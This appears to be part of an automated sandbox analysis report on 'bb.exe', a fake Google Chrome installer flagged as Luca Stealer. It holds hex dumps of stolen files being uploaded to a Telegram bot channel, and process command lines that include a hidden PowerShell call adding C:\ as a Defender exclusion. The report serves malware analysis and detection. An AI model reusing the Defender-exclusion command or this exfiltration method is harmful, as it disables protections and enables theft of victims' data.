                                                                                                      2023-09-07 14:42:19 UTC624OUTData Raw: 04 89 c1 e2 32 09 24 9e c5 e6 32 07 cf 22 f1 1c c4 8b c6 e6 59 24 fe 4d 24 1e 48 12 00 b6 79 16 1b 48 2e b3 79 fe 92 17 c8 06 f3 fc d9 bc 40 36 38 79 16 19 6c 9e 43 36 9e 83 1b 97 d9 3c 90 cc 33 25 00 b6 79 0e 36 cf c1 e6 32 73 85 1b 97 d9 80 79 96 34 cf a2 04 12 6c 00 b0 b9 9f 10 f7 b3 8d 48 00 6c f3 1c 6c 9e cd 00 60 03 00 09 69 9e 45 09 69 1e 48 d9 b8 9f 6d 9e 83 cd b3 25 cf 8f 54 30 2f 98 24 00 6c 73 99 cd 73 4a 9e 83 cd 15 06 40 12 00 b6 c1 06 00 9b fb 09 61 9b 67 b1 79 81 24 9e 47 88 17 ca e6 39 48 3c 5f 12 57 88 cb 6c 2e 93 40 42 12 97 a9 60 1b 6c ae 08 2e 93 78 be 6c 9e 83 c4 b3 25 d8 5c 91 48 c2 36 cf e2 e4 39 d8 c8 89 6d 9e 2f 9b 67 b1 79 0e 12 cf 62 83 0d 80 30 cf 4d 12 f7 b3 8d 6d 9e 1f 49 88 33 2f 6d fe 1d 42 02 20 6d ee f7 95 9f f8 9a 7c f4
                                                                                                      Data Ascii: 2$2"Y$M$HyH.y@68ylC6<3%y62sy4lHll`iEiHm%T0/$lssJ@agy$G9H<_Wl.@B`l.xl%\H69m/gyb0MmI3/mB m|
                                                                                                      2023-09-07 14:42:19 UTC640OUTData Raw: 73 0a 9e 83 82 07 92 c4 15 01 80 b9 42 12 2f 0a db bc 20 92 f8 d7 12 09 18 db 5c 21 1e 48 12 cf 29 b8 9f 01 94 3c 07 07 00 16 cf 14 5c 26 01 20 0a f7 b3 8d 24 ee 27 89 07 92 c4 fd 6c 73 3f db dc cf 34 fe 7d 92 e7 14 00 48 e2 f9 72 f0 1c 94 bc 28 94 e6 f9 b1 0d 24 2f 88 24 00 6c f3 fc 88 e7 64 37 9e 43 9a 07 32 c9 03 49 02 c0 36 0f 14 e6 32 db 5c 91 d8 06 40 12 32 58 60 cc 15 c9 73 48 f3 40 e1 c4 36 cf cd 36 0f 24 92 07 b2 cd 73 70 f2 42 d9 00 c8 5c 66 9b 2b 92 7f 91 0d 00 12 2f 2a f1 bc 6c f3 7c d9 3c 8f 6c 88 e4 7e b6 79 0e 36 57 98 e7 4b e2 81 24 f1 40 92 b0 cd 03 d9 e6 7e 92 78 61 6c f3 c2 48 c1 65 21 24 61 89 fb d9 06 82 07 52 1a 00 01 e6 99 94 bc 40 99 00 48 c2 36 f7 b3 cd 65 36 cf c1 e6 8a 04 40 e6 05 48 00 c4 b3 d9 e6 81 6c f3 2f 51 54 5e 18 49 d8
                                                                                                      Data Ascii: sB/ \!H)<\& $'ls?4}Hr($/$ld7C2I62\@2X`sH@66$spB\f+/*l|<l~y6WK$@~xalHe!$aR@H6e6@Hl/QT^I
                                                                                                      2023-09-07 14:42:19 UTC656OUTData Raw: 79 0e 51 79 0e 0e 2e b3 79 be 94 3c 07 89 17 89 cd b3 48 48 02 c0 e2 df c7 c1 bf 8b cd 65 12 cf 57 88 17 46 16 97 85 00 b0 0d 80 24 1e c8 bc 20 c1 73 90 78 81 6c fe f5 92 17 46 3c 27 db 00 48 e2 45 21 f3 ef 62 82 17 46 12 cf 8f 6d 00 2c 9e 4d e2 7e 92 78 51 58 fc ef e6 e0 f9 91 c4 8b c2 e2 df 45 e6 79 48 22 15 5c 66 f3 3c 24 fe cd 24 9e 53 f0 bf 5a 88 7f 17 05 2f 94 c4 bf 8b cd 0b a5 c2 7f 2a 89 2b 02 48 20 90 0c 04 56 42 0a 94 e0 00 25 38 40 09 0e 50 42 0a 94 e0 00 25 50 40 09 0e fe 43 84 78 a1 24 2e b3 79 0e 12 2f 0a 49 bc 30 b6 c0 e2 05 91 04 80 6d 24 71 3f 49 00 58 60 f1 2c 92 f8 d7 b0 cd 0b e5 e0 85 52 f2 c2 48 e2 85 31 c1 73 90 00 90 c4 0b 63 9b 2b 82 17 46 12 ff 16 b6 79 91 48 dc 4f 12 0f 24 09 db 00 48 e2 f9 b1 0d 80 6d ae 08 24 e1 10 97 25 57 48
                                                                                                      Data Ascii: yQy.y<HHeWF$ sxlF<'HE!bFm,M~xQXEyH"\f<$$SZ/*+H VB%8@PB%P@Cx$.y/I0m$q?IX`,RH1sc+FyHO$Hm$%WH
                                                                                                      2023-09-07 14:42:19 UTC672OUTData Raw: 6e 1e c8 e6 0a 81 c4 bf 85 1f ff 59 d8 c9 fe 3d 7f 4e 8e 07 80 08 09 49 28 02 00 29 40 22 22 90 04 21 24 21 05 52 80 02 49 20 11 2a 20 81 02 29 40 41 bc cc f7 73 99 cd bf 8b c4 0b 95 09 12 48 5c 66 f3 1c 24 fe 3d be ff ab 3f 89 77 79 97 77 25 b3 01 60 9e c9 3c 80 31 f7 13 d8 00 20 b0 41 80 6d 90 b0 8d 04 b5 14 7e f4 47 7f 94 b7 78 8b b7 a0 b5 c6 f9 f3 e7 f9 b9 5f f8 25 be fc 5b 7f 82 3b ef 3d cf f3 63 9b ff c9 be ff ab 3f 89 77 79 97 77 25 b3 01 60 9e c9 3c 80 31 f7 13 d8 5c 26 b0 41 80 6d 90 b0 8d 04 b5 14 7e f4 47 7f 94 b7 78 8b b7 a0 b5 c6 f9 f3 e7 f9 b9 5f f8 25 be fc 5b 7f 82 3b ee 39 07 80 24 00 6c f3 9c cc bf 96 24 00 40 58 80 83 7f 2b 39 00 b0 b8 4c 12 cf 8f c5 f3 27 f1 c2 48 02 c0 e2 3f 84 24 9e 83 03 8b ff 46 e2 df 25 93 7f 0d 49 3c 90 c5 bf 93
                                                                                                      Data Ascii: nY=NI()@""!$!RI * )@AsH\f$=?wyw%`<1 Am~Gx_%[;=c?wyw%`<1\&Am~Gx_%[;9$l$@X+9L'H?$F%I<
                                                                                                      2023-09-07 14:42:19 UTC688OUTData Raw: 67 ce f2 7d 7f 7d 00 c0 4b 5e d7 f3 65 6f 74 8a d7 78 f0 9c 17 e6 f7 6e 5d f1 09 bf 72 9e bf bd 67 00 e0 dd 5f 6a 8b 6f 79 ab d3 3c b7 ae ab 7c e9 97 7e 19 9f fe 55 3f c4 7f 3a 9b e7 20 f1 ef 22 9e 97 c4 b3 38 78 61 a4 c2 0b 62 71 85 00 f3 4c c9 15 c9 03 c9 c1 15 c1 73 4a fe 3d ac e0 32 89 cb 6c 9e 45 82 4c 90 40 e2 32 9b 7f 91 c4 0b 64 83 0d 12 00 32 2f 94 c5 73 92 00 90 04 80 c5 bf 8f cd b3 48 3c 90 24 6c f3 42 39 f8 3f 4d 3c 27 89 ff 58 e2 81 24 f1 9f c9 36 2f 8c 24 fe 37 b1 0a cf c1 e6 39 48 bc 30 92 78 20 db fc ab 84 f8 b7 90 04 80 53 fc bb 84 78 e1 82 e7 20 f1 ef 66 f3 2c 12 ff 5e 92 b8 9f 6d 1e 48 12 2f 94 0a 0f 64 71 85 c5 73 93 84 c5 7f 2d 89 e7 60 f3 1c 24 9e 1f 49 00 d8 e2 81 24 f1 1c 24 5e 18 db 5c 66 83 0d 00 12 48 fc 47 10 2f 1a db 48 e2 81
                                                                                                      Data Ascii: g}}K^eotxn]rg_joy<|~U?: "8xabqLsJ=2lEL@2d2/sH<$lB9?M<'X$6/$79H0x Sx f,^mH/dqs-`$I$$^\fHG/H
                                                                                                      2023-09-07 14:42:19 UTC704OUTData Raw: 5f 8a e7 65 f3 2c 12 ff 1a 92 f8 d7 b0 78 1e 92 78 16 07 f7 93 04 80 6d ee 67 05 ff 22 89 67 b1 b9 4c e2 f9 b2 b9 4c 42 12 b6 f9 cf 95 5c 11 00 88 c2 65 21 ae 10 57 98 07 b2 b8 c2 e6 85 92 f8 4f a5 e0 85 92 78 16 9b e7 26 f3 22 b1 cd f3 25 f3 df 2b b9 2c cd 0b 23 9e 3f db fc 97 b3 79 1e 12 cf c1 e6 05 92 b8 9f b2 f1 df c9 0a 5e 28 89 17 46 69 fe ed 12 db a0 e4 df cc 8d cb cc 0b 67 03 20 5e 38 db fc eb 98 7f 97 e4 59 24 f1 af 65 99 7f 15 9b e7 94 fc af 96 e6 85 b2 f9 57 91 78 81 6c 9e 57 f2 ef 21 f3 af 62 1b 00 49 fc 5b d8 e6 39 28 f9 37 b1 b9 cc c1 73 90 b8 22 90 84 c5 73 92 78 41 24 f1 dc 6c f3 dc 24 f1 2c 2a d8 e6 7e 92 b8 9f 6d fe 25 92 f8 af 62 9b e7 60 03 c9 73 93 c4 8b ca e2 39 d9 3c 8b c4 bf 00 c5 e9 17 37 cf c5 36 0c fb 78 fd 96 fc e2 fa a3 78 d2
                                                                                                      Data Ascii: _e,xxmg"gLLB\e!WOx&"%+,#?y^(Fig ^8Y$eWxlW!bI[9(7s"sxA$l$,*~m%b`s9<76xx
                                                                                                      2023-09-07 14:42:19 UTC720OUTData Raw: 48 fc 67 12 60 9b e7 47 12 f7 b3 cd f3 97 bc 50 36 48 bc 40 21 fe 5d d2 80 f9 97 48 e2 81 6c 03 10 3c 9b 6d 5e 14 92 b8 5f 22 fe 43 d8 3c 07 89 ff 59 cc f3 13 bc e8 6c f3 af 25 89 ff 4c 89 f8 57 b1 79 0e 12 ff 51 24 61 f1 42 c9 fc 8b 6c f3 5f 26 c4 8b cc 06 00 89 67 b1 79 be 1c 00 28 2a 00 b6 79 20 a9 00 20 9d 7a 31 f3 42 d8 e6 81 24 f1 bf 89 6d fe 3d 24 f1 c2 d8 e6 df 4b 12 f7 b3 cd fd 24 f1 fc 48 e2 7e b6 f9 f7 b0 1b ff 3e c1 bf 87 24 fe 3d 6c f3 c2 48 e2 ff 23 49 00 d8 06 c0 00 12 cf 4b fc 4b 24 f1 40 b6 91 84 24 6c f3 40 b6 f9 8f 10 e6 39 c9 3c 90 6d fe a7 92 c4 73 4b 5e 10 f1 bf 89 24 fe 23 99 e0 3f 92 24 5e 18 db 3c 90 54 f8 f7 b0 78 e1 24 2e b3 f9 0f 23 71 3f 49 fc 7b 58 fc f7 72 f0 40 92 78 41 6c 03 80 cd f3 25 71 3f 49 00 d8 e6 5f 43 12 0f 64 f1
                                                                                                      Data Ascii: Hg`GP6H@!]Hl<m^_"C<Yl%LWyQ$aBl_&gy(*y z1B$m=$K$H~>$=lH#IKK$@$l@9<msK^$#?$^<Tx$.#q?I{Xr@xAl%q?I_Cd
                                                                                                      2023-09-07 14:42:19 UTC736OUTData Raw: 00 11 41 66 02 20 09 db 00 d8 46 12 b6 b1 8d 24 00 24 91 99 44 04 00 b6 91 04 80 24 5a 6b 44 04 00 b6 89 08 32 13 49 d8 46 12 4e 03 20 09 db 00 48 c2 36 11 81 24 5a 6b 00 d8 06 20 22 b0 13 49 d8 26 22 68 ad 21 09 49 00 64 26 92 28 a5 90 99 48 c2 36 92 68 ad 01 60 9b 5a 2b ad 35 24 01 60 9b 5a 2b b6 c9 4c 22 82 cc c4 36 11 01 40 66 22 09 00 db 94 52 c8 4c 24 11 11 64 26 11 41 66 92 99 48 22 22 b0 8d 6d 24 01 20 09 db 64 36 22 0a 00 76 12 11 d8 c6 36 92 c8 4c 24 21 89 fb d9 06 20 22 c8 4c 24 21 89 cc 44 12 f7 b3 4d 44 90 99 48 02 40 12 d9 12 00 db 94 5a 68 53 23 22 c8 4c 24 11 25 00 68 53 03 40 12 51 82 6c 49 94 40 12 6d 6a 48 c2 36 51 82 6c 49 94 c0 69 14 22 5b 22 89 cc 44 12 51 82 36 35 22 02 db 48 c2 36 f7 8b 08 6c 23 09 db d8 c6 36 92 00 90 44 66 22 09
                                                                                                      Data Ascii: Af F$$D$ZkD2IFN H6$Zk "I&"h!Id&(H6h`Z+5$`Z+L"6@f"RL$d&AfH""m$ d6"v6L$! "L$!DMDH@ZhS#"L$%hS@QlI@mjH6QlIi"["DQ65"H6l#6Df"
                                                                                                      2023-09-07 14:42:19 UTC752OUTData Raw: 95 4f 84 2f fd a3 cf e0 35 78 a0 df e3 f3 5e e5 3b 78 c8 8f 7c 37 ef 7e 0b cf e5 36 be ff bd df 89 6f 78 22 bc e9 97 fe 11 9f f1 1a 5c f1 7b 9f c7 ab 7c e2 2f f2 fc bc e9 97 fe 11 9f f1 1a 5c 76 db f7 bf 37 ef f4 0d 4f e4 59 1e f5 61 fc c8 77 bf 3b b7 70 1b df ff de ef c4 d3 df ef 8f f8 8c d7 e0 8a df fb 3c 5e e5 13 e1 4b ff e8 33 78 0d 9e db 6d 7c ff 7b bf 13 4f 7f bf 3f e2 33 5e 83 2b 6e fb 7e de fb 9d 7e 9d d7 ff 91 ef e6 dd 6f e1 aa ab fe c3 bd ca ab bc 0a 7f f4 47 7f c4 ab bc ca ab f0 47 7f f4 47 3c b7 57 79 95 57 e1 8f fe e8 8f 78 95 57 79 15 fe e8 8f fe 88 7f ab 6b 6f 7c 08 0a 31 8d 13 11 41 66 22 09 49 00 d8 06 40 12 92 00 b0 0d 40 66 b2 3e bc c8 6c f3 04 92 50 08 00 db 94 52 c8 4c 6c 23 89 e5 de 79 16 3b a7 b0 8d 24 96 7b e7 59 ec 9c c2 36 b6 91
                                                                                                      Data Ascii: O/5x^;x|7~6ox"\{|/\v7OYaw;p<^K3xm|{O?3^+n~~oGGG<WyWxWyko|1Af"I@@f>lPRLl#y;${Y6
                                                                                                      2023-09-07 14:42:20 UTC768OUTData Raw: 64 26 11 81 6d 1e 48 12 b6 91 84 d3 48 e2 b9 d9 e6 7e 11 01 40 66 02 20 09 db 80 89 28 64 36 ee 27 89 d6 1a 11 81 6d 24 21 89 cc a4 94 42 66 22 89 cc c4 36 a5 14 00 6c 03 20 09 db d8 e6 b9 95 52 b8 5f 66 22 89 cc a4 94 42 66 02 20 09 db 00 48 c2 36 11 41 66 02 20 89 07 92 44 66 72 bf 88 c0 4e 6c 03 10 11 64 26 92 00 c8 4c 4a 29 00 d8 e6 7e b6 b9 9f 6d 22 02 db d8 26 22 00 b0 4d 44 60 1b 49 64 4b 24 61 1b db 44 04 b6 b1 4d 44 10 25 98 c6 89 88 00 20 33 89 08 00 6c 23 09 db 44 09 9c 46 21 9c c6 36 92 b8 9f 6d 4a 2d b4 a9 21 89 fb d9 a6 d4 c2 38 8c 48 42 12 f7 93 c4 fd 6c 63 9b 52 0a 92 c8 4c ee 27 89 cc 44 12 00 b6 01 90 84 24 5a 6b 44 04 2f 88 24 6c 63 1b db 94 52 90 c4 34 4d 44 04 99 89 24 24 01 60 1b 00 49 48 02 c0 36 00 99 89 24 6c 23 09 49 80 b1 4d 29
                                                                                                      Data Ascii: d&mHH~@f (d6'm$!Bf"6l R_f"Bf H6Af DfrNld&LJ)~m"&"MD`IdK$aDMD% 3l#DF!6mJ-!8HBlcRL'D$ZkD/$lcR4MD$$`IH6$l#IM)
                                                                                                      2023-09-07 14:42:20 UTC784OUTData Raw: 45 4e 4c 4b 41 52 51 47 54 45 43 41 49 58 4f 58 45 5a 50 46 44 46 4a 48 59 46 43 4b 4c 41 44 4d 43 57 59 4f 4d 43 49 54 52 48 4d 45 43 56 56 56 4e 50 4e 54 53 52 58 59 47 59 52 4b 5a 55 54 4f 46 4e 42 4d 48 44 5a 57 59 48 50 59 4c 54 57 45 49 47 57 4f 49 47 42 54 48 57 59 47 49 58 42 43 55 44 59 4d 5a 4d 54 5a 4e 59 51 4d 5a 4c 4d 58 4b 50 4e 46 5a 44 55 45 58 58 51 4c 46 4a 5a 5a 5a 56 4f 50 42 45 5a 4b 54 4b 54 4a 43 54 4e 55 50 52 43 4e 4e 47 43 50 54 49 48 4b 50 54 47 42 4a 4c 47 55 45 4e 4e 55 47 54 5a 56 4d 5a 4a 47 51 47 55 56 42 52 4c 4f 4a 5a 45 43 42 4c 49 4e 45 4b 47 53 49 52 46 57 5a 50 57 4d 56 59 4a 4e 45 50 57 47 59 49 41 48 4b 4d 4a 52 42 5a 4d 52 56 49 42 50 4f 4e 4d 48 42 44 51 5a 59 46 42 48 44 44 4d 59 42 5a 5a 41 46 45 50 41 51 46 46
                                                                                                      Data Ascii: ENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFF
                                                                                                      2023-09-07 14:42:20 UTC800OUTData Raw: 00 00 00 00 00 a4 81 5f 36 00 00 4d 4e 55 4c 4e 43 52 49 59 43 2e 64 6f 63 78 50 4b 01 02 2e 03 14 00 00 00 00 00 7c 7f 27 57 64 2f 29 68 02 04 00 00 02 04 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 a4 81 8e 3a 00 00 4f 4e 42 51 43 4c 59 53 50 55 2e 70 64 66 50 4b 01 02 2e 03 14 00 00 00 00 00 7c 7f 27 57 ea 4a 80 5b 02 04 00 00 02 04 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a4 81 bc 3e 00 00 54 51 44 47 45 4e 55 48 57 50 2e 64 6f 63 78 50 4b 01 02 2e 03 14 00 00 00 00 00 7c 7f 27 57 ea 4a 80 5b 02 04 00 00 02 04 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 a4 81 eb 42 00 00 54 51 44 47 45 4e 55 48 57 50 2e 70 64 66 50 4b 01 02 2e 03 14 00 00 00 00 00 7c 7f 27 57 9c bc bb 73 02 04 00 00 02 04 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a4 81 19 47 00 00 5a 53
                                                                                                      Data Ascii: _6MNULNCRIYC.docxPK.|'Wd/)h:ONBQCLYSPU.pdfPK.|'WJ[>TQDGENUHWP.docxPK.|'WJ[BTQDGENUHWP.pdfPK.|'WsGZS
                                                                                                      2023-09-07 14:42:21 UTC802INHTTP/1.1 200 OK
                                                                                                      Server: nginx/1.18.0
                                                                                                      Date: Thu, 07 Sep 2023 14:42:20 GMT
                                                                                                      Content-Type: application/json
                                                                                                      Content-Length: 1103
                                                                                                      Connection: close
                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                      2023-09-07 14:42:21 UTC803INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 36 2c 22 73 65 6e 64 65 72 5f 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 31 38 32 36 31 37 39 38 31 36 2c 22 74 69 74 6c 65 22 3a 22 6f 72 76 61 73 62 6f 74 22 2c 22 74 79 70 65 22 3a 22 63 68 61 6e 6e 65 6c 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 31 38 32 36 31 37 39 38 31 36 2c 22 74 69 74 6c 65 22 3a 22 6f 72 76 61 73 62 6f 74 22 2c 22 74 79 70 65 22 3a 22 63 68 61 6e 6e 65 6c 22 7d 2c 22 64 61 74 65 22 3a 31 36 39 34 30 39 37 37 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 5b 55 53 5d 5f 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 2e 7a 69 70 22 2c 22 6d 69 6d 65 5f 74 79 70 65 22 3a 22
                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":436,"sender_chat":{"id":-1001826179816,"title":"orvasbot","type":"channel"},"chat":{"id":-1001826179816,"title":"orvasbot","type":"channel"},"date":1694097740,"document":{"file_name":"[US]_191.101.61.19.zip","mime_type":"


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:16:41:35
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Users\user\Desktop\bb.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\Desktop\bb.exe
                                                                                                      Imagebase:0xc90000
                                                                                                      File size:11'824'016 bytes
                                                                                                      MD5 hash:0B61F6FCF7864A2F87D91E3A1EECF340
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:16:41:38
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                      Imagebase:0x7ff797660000
                                                                                                      File size:66'048 bytes
                                                                                                      MD5 hash:4767B71A318E201188A0D0A420C8B608
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:16:41:39
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 39B2946DA8EA32E5CF40005A5AF4C9C3 C
                                                                                                      Imagebase:0x1390000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:16:41:55
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Users\user\Desktop\bb.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\Desktop\bb.exe" /i "C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install\Google Chrome.msi" AI_EUIMSI=1 APPDIR="C:\Program Files\Google LLC\Google Chrome" SHORTCUTDIR="C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome" SECONDSEQUENCE="1" CLIENTPROCESSID="6524" CHAINERUIPROCESSID="6524Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_SETUPEXEPATH="C:\Users\user\Desktop\bb.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1694097598 " AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\bb.exe" TARGETDIR="C:\" AI_INSTALL="1
                                                                                                      Imagebase:0xc90000
                                                                                                      File size:11'824'016 bytes
                                                                                                      MD5 hash:0B61F6FCF7864A2F87D91E3A1EECF340
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:16:41:58
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 168A822027102CE8D563A5F7F2223835
                                                                                                      Imagebase:0x1390000
                                                                                                      File size:59'904 bytes
                                                                                                      MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:16:41:59
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\pssD8.ps1" -manufacturer "Google LLC" -pass "aicD7.pfx" -pfxPath "C:\Users\user~1\AppData\Local\Temp\aicD7.pfx"
                                                                                                      Imagebase:0xe30000
                                                                                                      File size:430'592 bytes
                                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:9
                                                                                                      Start time:16:41:59
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff751820000
                                                                                                      File size:625'664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:12
                                                                                                      Start time:16:42:06
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Program Files\Google LLC\Google Chrome\setup.exe
                                                                                                      Imagebase:0x7ff610e90000
                                                                                                      File size:4'431'104 bytes
                                                                                                      MD5 hash:BBB9D1514179EFCC7E990CE9367EC2C3
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 0000000C.00000000.275348795.00007FF611186000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 0000000C.00000002.304112093.00007FF611186000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: C:\Program Files\Google LLC\Google Chrome\setup.exe, Author: Joe Security
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 22%, ReversingLabs
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:14
                                                                                                      Start time:16:42:06
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"powershell.exe" -WindowStyle Hidden -Command "Set-MpPreference -ExclusionPath" C:\
                                                                                                      Imagebase:0x7ff65a260000
                                                                                                      File size:447'488 bytes
                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:15
                                                                                                      Start time:16:42:07
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff751820000
                                                                                                      File size:625'664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:16
                                                                                                      Start time:16:42:09
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName
                                                                                                      Imagebase:0x7ff65a260000
                                                                                                      File size:447'488 bytes
                                                                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:17
                                                                                                      Start time:16:42:10
                                                                                                      Start date:07/09/2023
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff751820000
                                                                                                      File size:625'664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:3.3%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
